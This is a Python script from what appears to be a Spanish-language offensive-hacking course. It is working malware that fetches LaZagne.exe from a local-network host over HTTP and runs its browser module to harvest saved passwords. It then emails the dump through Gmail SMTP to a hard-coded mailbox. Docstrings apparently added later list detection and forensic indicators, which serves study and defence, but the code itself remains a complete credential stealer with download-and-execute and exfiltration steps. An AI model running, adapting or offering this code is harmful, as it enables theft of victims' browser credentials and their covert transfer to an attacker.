Curso-lenguaje-python/python-ofensivo/15_hacking/10_malware/02_malware.py

#!/usr/bin/env python3
"""
Malware - LaZagne
LaZagne.exe https://github.com/AlessandroZ/LaZagne
Este virus no se puede ejecutar con Windows Defender activado.
Si lo desactivamos, LaZagne recogerá las contraseñas de los navegadores y las
enviará por correo.
Algunas librerías necesitarán instalación si se ejecuta con Python directamente.
"""
import dotenv
import os
import requests
import subprocess
import smtplib
import tempfile
from email.mime.text import MIMEText
def run_command(command):
    """
    Run *command* through the system shell and return what it printed.

    The string reaches the shell unchanged (``shell=True``), so it has to be
    a constant chosen by the caller and never text assembled from outside
    input. A non-zero exit status raises ``subprocess.CalledProcessError``.
    Only standard output is captured; the bytes are decoded as cp850, an OEM
    console code page that is hard-coded here rather than detected.
    """
    completed = subprocess.run(
        command,
        shell=True,
        check=True,
        stdout=subprocess.PIPE,
    )
    return completed.stdout.decode('cp850')
def send_email(subject, body, sender, recipients, password):
    """
    Send a plain-text report by e-mail through smtp.gmail.com.

    Builds a ``MIMEText`` message from *body*, sets the Subject/From/To
    headers (*recipients* is a list, joined with ", " for the To header),
    opens an implicit-TLS session to smtp.gmail.com on port 465, logs in as
    *sender* with *password* and hands the message to the server.

    In this script the body is the credential dump returned by
    download_and_execute_lazagne(), so this call is the exfiltration step:
    an outbound connection to smtp.gmail.com:465 from a process that is not
    a mail client is the network-side indicator to look for.
    """
    message = MIMEText(body)
    headers = (
        ('Subject', subject),
        ('From', sender),
        ('To', ', '.join(recipients)),
    )
    for header_name, header_value in headers:
        message[header_name] = header_value

    smtp_server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
    with smtp_server:
        smtp_server.login(sender, password)
        smtp_server.sendmail(sender, recipients, message.as_string())

    print(f"[i] Email sent Successfully!\n")
def download_and_execute_lazagne():
    """
    Fetch LaZagne.exe from a hard-coded host, run its ``browsers`` module
    and return the text it prints.

    Steps, in order: HTTP GET of the binary, creation of a fresh temporary
    directory, change of the process working directory into it, write of the
    binary to disk, execution, deletion of the binary.

    Artefacts this leaves for detection and forensics:
    - an unencrypted HTTP request for ``/LaZagne.exe`` to 192.168.1.120;
    - a newly created directory in the default temp location that briefly
      holds ``LaZagne.exe``;
    - a ``LaZagne.exe browsers`` process started through the system shell
      (run_command uses ``shell=True``) as a descendant of the Python process;
    - the temporary directory itself, which stays on disk after the
      executable is removed.
    """
    # Plain HTTP: the request and the returned binary cross the network in clear text.
    r = requests.get("http://192.168.1.120/LaZagne.exe")
    # mkdtemp() creates a directory and returns its path (the variable name says "file").
    temp_file = tempfile.mkdtemp()
    # Changes the working directory of the whole process, not only of this function.
    os.chdir(temp_file)
    with open("LaZagne.exe", "wb") as f:
        f.write(r.content)
    # Relative name, resolved against the directory entered above.
    lazagne_output = run_command("LaZagne.exe browsers")
    # Only the executable is deleted; the directory created by mkdtemp() is left in place.
    os.remove("LaZagne.exe")
    return lazagne_output
if __name__ == '__main__':
    # Step 1: obtain the text printed by LaZagne's browsers module.
    output = download_and_execute_lazagne()
    # Step 2: load variables from a .env file into the process environment (python-dotenv).
    dotenv.load_dotenv()
    # Presumably a Gmail app password; os.getenv returns None when APP_PASSWD is not set.
    app_passwd = os.getenv("APP_PASSWD")
    # Step 3: mail the collected text. Sender and sole recipient are the same
    # hard-coded mailbox, and the subject is a fixed string; both are constant
    # values that mail-gateway or content-inspection rules can match on.
    send_email(
        "LaZagne Browser INFO",
        output,
        "keyloggerseginf@gmail.com",
        ["keyloggerseginf@gmail.com"],
        app_passwd
    )